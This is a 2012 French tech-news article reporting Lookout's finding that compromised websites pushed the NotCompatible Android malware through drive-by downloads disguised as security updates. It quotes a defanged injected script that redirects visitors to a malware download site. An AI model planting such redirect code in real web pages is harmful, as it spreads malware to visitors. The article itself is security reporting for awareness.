Sécurité : un nouveau malware Android se propage par le biais de sites mobiles

Publié le 03 mai 2012 à 16h31

L'éditeur en sécurité mobile Lookout a mis le doigt sur un nouveau moyen utilisé par les hackers pour propager des malwares sur des terminaux Android : ces derniers utilisent une méthode proche de celle existant déjà sur les ordinateurs, qui consiste à charger un logiciel malveillant lorsqu'un site Web spécifique est visité.

« Dans ce type d'attaque, si un utilisateur visite un site Web compromis à partir d'un appareil Android, son navigateur Web va automatiquement commencer à télécharger une application. Cette méthode est communément appelée 'drive-by download' » explique Lookout sur son blog, c'est à dire que le mobinaute n'est pas invité à controler le téléchargement. « Lorsque l'application suspecte est téléchargée, l'appareil affiche une notification qui invite l'utilisateur à cliquer sur la notification pour installer l'application téléchargée. » Cette dernière est présentée comme une mise à jour de sécurité pour le terminal : elle nécessite cependant que l'autorisation d'installer des « sources inconnues » ait été accordée au préalable par l'utilisateur.

Il existe donc des freins à la propagation du malware en question, nommé NotCompatible, dont l'installation sur un terminal mobile permet de modifier les paramètres proxy de ce dernier. Néanmoins, ce qui interpelle Lookout dans cette situation, c'est principalement la méthode employée par les pirates pour diffuser le malware : selon l'éditeur, il semble que ce soit « la première fois que des sites Web compromis sont utilisés pour distribuer des logiciels malveillants ciblant les terminaux Android. »

Les sites infectés intègrent plusieurs morceaux de code dans chacune de leurs pages : l'élément suivant se trouve en bas de chaque page, et permet de déterminer la nature du terminal qui visite le site :

S'il s'agit d'un terminal Android, le site redirige vers le téléchargement du malware.

<html> <head> </ head> <body> <script type="text/javascript"> window.top.location.href = "hxxp :/ / androidonlinefix.info/fix1.php"; </ script> < / body> </ html>

Lookout travaille encore à l'évaluation du nombre de sites infectés par cette méthode, ainsi que sur son origine. Il y a cependant fort à parier que cette démarche risque de se démocratiser.

Par Audrey Oeillet

Journaliste mais geekette avant tout, je m'intéresse aussi bien à la dernière tablette innovante qu'aux réseaux sociaux, aux offres mobiles, aux périphériques gamers ou encore aux livres électroniques, sans oublier les gadgets et autres actualités insolites liées à l'univers du hi-tech. Et comme il n'y a pas que les z'Internets dans la vie, j'aime aussi les jeux vidéo, les comics, la littérature SF, les séries télé et les chats. Et les poneys, évidemment.

Articles d'Audrey Oeillet

Vous êtes un utilisateur de Google Actualités ou de WhatsApp ?
Suivez-nous pour ne rien rater de l'actu tech !

Commentaires (0)

Rejoignez la communauté Clubic

Rejoignez la communauté des passionnés de nouvelles technologies. Venez partager votre passion et débattre de l’actualité avec nos membres qui s’entraident et partagent leur expertise quotidiennement.